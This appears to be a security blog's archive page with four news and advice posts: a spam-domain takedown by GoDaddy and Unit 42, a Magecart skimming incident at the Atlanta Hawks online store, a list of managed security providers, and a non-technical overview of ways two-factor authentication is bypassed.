Category Archives: Website Security

15,000 Spam Domains Banned By GoDaddy

The security team Palo Alto Network’s Unit 42 and GoDaddy had partnered in taking down 15,000 domains that host spam and tasteless products online. Offers from these websites range from fly-by-night weight-loss drugs, dodgy food supplements and everything in between. The project to purge 15,000 spammy domains didn’t occur overnight, it took the Unit 42 and GoDaddy teams two years in conducting their investigation, this with the goal of minimizing false positives.

In their investigation, many names of celebrities were named by the domains as being their “endorsers” of the products they sell. This was an attempt to increase the reputation of the products they sell. Names such as Gwen Stefani and even the deceased Stephen Hawking were named as endorsers of medical products, stating that they were beneficial for their healthy living. The websites associated with the spamvertising were also seen as copying the visual designs of genuine prominent websites like E! Online and TMZ.

The sites mentioned also implement Facebook-like elements, like the “Like” button, but it does not function similar to how Facebook implements them. They were only there just as another link to selling more dodgy products. The websites also have the habit of asking people to use their credit card when buying their products, which adds more risk when it comes to their financial security.

“When people go to cancel, they realize that they can’t. A lot of times when they try to contact the company, no one gets back to them. No one’s ever going to get back to them, because that’s how these companies make their money, off of these refills,” explained Jen Miller-Osborn, Unit 42’s Deputy Director of Threat Intelligence.

All is not lost for the victims, as they may attempt to call their credit card provider in hopes of canceling the questionable credit card transaction. Of course, if the charge happened a long time ago, there will be challenges to cancel the transaction, and the charge already incurs its corresponding interest.

“In our process of analysis, we’re presented with an array of screenshots from the virtual systems that crawl these websites; this is why after seeing these images time and time again they eventually became ingrained in my mind and I could start to recognize templates being used and their slight variations over time. While this campaign phased out, there was another running in parallel with the same tactics but a different product, switching from “brain supplements” to ‘weight loss.’ It keeps the celebrity endorsement theme and continues masquerading as a legitimate website,” emphazed Jeff White, Senior Threat Researcher at Palo Alto Networks.

Some parts of the websites use URL-shortening service, these types of redirects are dangerous to any users as the only practical way to determine the destination site of a shortened URL is to visit it. Knowing the exact website where the shortened URL points to require knowledge that such service is available. One such service is http://checkshorturl.com/ but of course not all Internet users are aware of such, we hope that through this article we help you educate yourself in lessening the risks you face in the Internet every day.

Also, Read:

Beware! Even Good Domains Also Carries Malicious URLs

Federal Websites Shutdown Due to Expired Security certificates

The post 15,000 Spam Domains Banned By GoDaddy appeared first on .

Hackers Target Atlanta Hawks Online NBA Basketball Store

When it comes to cyber attack campaigns, we are often hearing news involving a financial institution, a multinational company or a healthcare firm. Never in our typical understanding of cyber attacks will attack anything that has relation to a single NBA team, or any sporting team in general. However, on April 23, Atlanta Hawks, one of the teams competing in the National Basketball Association saw its merchandise site becoming a victim of a cyber attack. The attack was apparently pulled-off with the use of Magecart, a specific attack used to capture user credit cards. We have featured Magecart last Nov 2018, a notorious credit card stealing malware.

“The first time we detected skimming code on the website was June 6th of 2017. The compromise wasn’t targeted however, it was one aimed at hundreds of websites at the same time,” explained Yonathan Klijnsma, RiskIQ’s Threat Researcher.

Atlanta Hawks spokesperson mentioned that everything is fine now, but the investigation continues with regards to HawksShopdotcom, the team’s official merchant store site. “We take these matters of security and privacy extremely seriously. Yesterday, we were alerted the host site for HawksShopdotcom was subject to an isolated attack. Upon receiving that information, we disabled all payment and checkout capabilities to prevent any further incident. At this stage of the investigation, we believe that less than a handful of purchases on HawksShopdotcom were affected. We are continuing to investigate and will provide updates as needed,” explained Atlanta Hawks spokesperson.

As security experts review the HawksShopdotcom, it has been discovered that it is running Magento Commerce Cloud 2.2, an Adobe-made e-commerce system. There is a small probability that the data breach is related to imagesenginedotcom, where information that was stolen was apparently stored. Imagesenginesdotcom is a new domain, with registration dated March 25, 2019.

Willem de Groot, a security researcher made a comment in Twitter, is doubtful about the statements of the Atlanta Hawks spokesperson:

Last week, the NBA Hawks got hacked (@ATLHawks).

“We take these threats seriously and are investigating,” a Hawks spokesperson said. The malware is no longer active on the site, the representative said.

Is it? pic.twitter.com/zTHyG7VtBQ
— Willem de Groot (@gwillem) April 24, 2019

NBA’s Atlanta Hawks Merchandise Shop Hacked

 

 

 

 

 

 

 

Also, Read:

Atlanta Still Recovering Nearly Three Weeks After Cyberattack

Magstripe Credit/Debit Cards & Magstripe-only POS: A Security Nightmare

Tools and Tips to recover a Hacked Website [Infographic]

The post Hackers Target Atlanta Hawks Online NBA Basketball Store appeared first on .

The 10 Best Managed Security Service Providers in 2019

With the endless supply of cyber threats, security breaches in always in the news and many enterprises. IT departments feel outsmarted by cybercriminals. To counter this they turn to managed security service providers.

Managed security service has become big business. Companies like IBM, BT and Verizon are among the leading in this field. These vendors augment internal security measures or take over many of the functions of IT security.

This guide covers the top managed service providers for security.

1. DXC Technology

DXC has a portfolio of integrated solutions that includes security advisory, risk management, intelligent security operations infrastructure, endpoint security, identity and access management, threat and vulnerability management, data protection and cloud security.

2. Symantec

Symantec provides monitoring and management of the customers’ security environment. Also intelligence services and advanced threat protection, in addition to incident response and cyber skills development, intrusion detection and prevention system (IDPS) management, hosted log retention. The company with dedicated security analysts to prepare and provide details and recommendations on incidents.

3. SecureWorks

SecureWorks services are accessed via the SecureWorks Client Portal offers security services through it’s Counter Threat Appliance (CTA) and Counter Threat Platform (CTP). It also offers Advanced Malware Protection and Detection (AMPD) in partnership with Lastline. Host and network-based advanced threat detection are via SecureWorks’ Advanced Endpoint Threat Detection (AETD) service. Additional services, such as vulnerability scanning and advanced threat intelligence services, are also available.

4. IBM

IBM provides a wide range of MSSP services including vulnerability scanning, information event network protection, firewall management, data protection, security intelligence analysis, web gateway management, unified threat management (UTM) secure software-defined wide area network (SD-WAN), adaptive security for hybrid cloud, endpoint security and Amazon GuardDuty service, and intelligent log management in the cloud.

5. AT&T

The AT&T Threat Manager is the company’s security event monitoring and management service. Threat analysis is performed via the AT&T Threat Intellect platform, which includes SIEM, big data, and analytics. Device management is available for network security, data and application security, endpoint and mobile security. It is delivered as part of AT&T’s Threat Management and Intelligence solutions. Service options include Internet and Intranet protection, mobile security, DDoS defense, firewalls, Web application protection, IDPS, email gateway, endpoint security, encryption, device management, and token authentication.

6. Verizon

Verizon Enterprise cybersecurity provides security monitoring and operations, security professional services, network and gateway security, and incident response. Its analytics platform also includes a customer portal.

7. BT

BT offers a secure web gateway (SWG), next-generation firewall (NGFW), IDPS, UTM, managed, distributed denial of service (DDoS) protection, vulnerability scanning, application security, network access control, public key infrastructure (PKI) security, patch management, threat monitoring and intelligence, email security, security information and event management (SIEM), and more. It has partnerships with Trend Micro’s Deep Security and Symantec SSL decryption.

8. CenturyLink

CenturyLink’s professionally managed, next-generation network-based firewall Solution Company. The services include adaptive network security and threat intelligence. CenturyLink’s security operations centers (SOCs) can respond to physical and logical alarms, attacks and suspicious or abnormal network activity, as well as to assist with customer security inquiries.

9. Trustwave

Trustwave services include rogue device detection network firewalls, IDPS, UTM, and internal vulnerability scanning, all consolidated into a single appliance as a fully managed service. Trustwave SWG decrypts, unpacks and assembles web pages and exposes any malicious behavior, and also block new malware in real-time.

10. HackerCombat

HackerCombat IT Service Management is all about implementing and managing IT services as per customers’ requirements. HackerCombat seeks to simplify and streamline IT and security management needs. ITSM services rank among the best in the industry and seek to provide comprehensive solutions. HackerCombat Web Security software excels in detection and remediation of sophisticated threats and provides the best of proactive preventive measures.

Also, Read:

Managed Service Providers in the Era of Ransomware

Ten Best Network Scanning Tools for Network Security

The Top 10 Computer Forensics Tools For Analyzing A Breach

The post The 10 Best Managed Security Service Providers in 2019 appeared first on .

Old-School Ways To Bypass Two-Factor Authentication

We regularly remind our readers to always take advantage of 2FA (Two-Factor Authentication) on all web services that they are signed-up for if the option is available. All mainstream web services have an optional 2FA feature, disabled by default but can be enabled by the user. 2FA is available in Facebook, Twitter, Gmail/Google account, Microsoft account and possibly all mainstream online banking websites. Google itself uses hardware-based 2FA device, which made the company virtually immune to phishing and minimize the chance of information leak.

However, just like everything in the world, 2FA has certain weaknesses and we will guide you not to fall for tricks that takes advantage of these weaknesses:

  • Online Blackmail

Blackmailed people tend to do what the other party wish for them to do. That means that the 2FA feature is basically useless if the person is targeted and blackmailed. The information will be leaked by the very people that use the 2FA system to protect the information they hold, hence a loophole in security. It only shows that the human operator is the weakest part of any IT security policies; people who are prone to blackmail are those that have their own skeletons in the closet that the attackers know about. This is a classic example on how information can be extracted regardless of the level of security precaution and policies implemented inside the organization. It only takes one employee that fell for that blackmail to release the information that the attackers wish to have.

  • Fake 2FA apps

Fake apps are a dime-a-dozen for smartphone users who download apps outside the official app stores. This is the very reason that Apple has restricted their iOS devices to just download apps from the iTunes App Store, and it requires a significant level of knowledge to jailbreak the device to bypass this. While Google allows sideloading of Android apps, such feature is disabled by default. Fake 2FA apps are usually trojanized version of the original apps. This way, they make way for the 2FA code to reach the command and control servers within the timeframe of the useful life of the randomly generated code.

  • Social Engineering

Social Engineering is a skill for someone to successfully pull-off. With socially engineered employees information can be extracting from them, while not being aware of it. The art of persuading someone is not a skill that can be learned overnight, it requires careful preparation and a lot of practice in order to sound reasonable and believable. Any campaigns that attack human weaknesses will be able to bypass whatever technological barriers, restrictions and policies.

  • MitB Campaign

Also known as Man-in-the-middle attack, it is strongly linked with using fake apps. When the fake app runs in the background, it can monitor everything that is entered in the virtual keyboard, whatever the clipboard contains and can read any SMS stored in the device. This is enough to capture the user credentials and the 2FA code of the user if they are using the mobile device as the source of the 2FA. For those that use the PC for logging-in and the mobile device for 2FA, the chances of the attackers to receive the 2FA code on time is astronomically small. We are strongly recommending not to sideload any apps if the user can, as it is very difficult to assure that the app is clean when downloaded outside of the official app stores.

Also, Read:

The EU Knows How To Make Two-Factor Authentication Mandatory

Facebook Makes Two-Factor Authentication Easier to Set Up

The post Old-School Ways To Bypass Two-Factor Authentication appeared first on .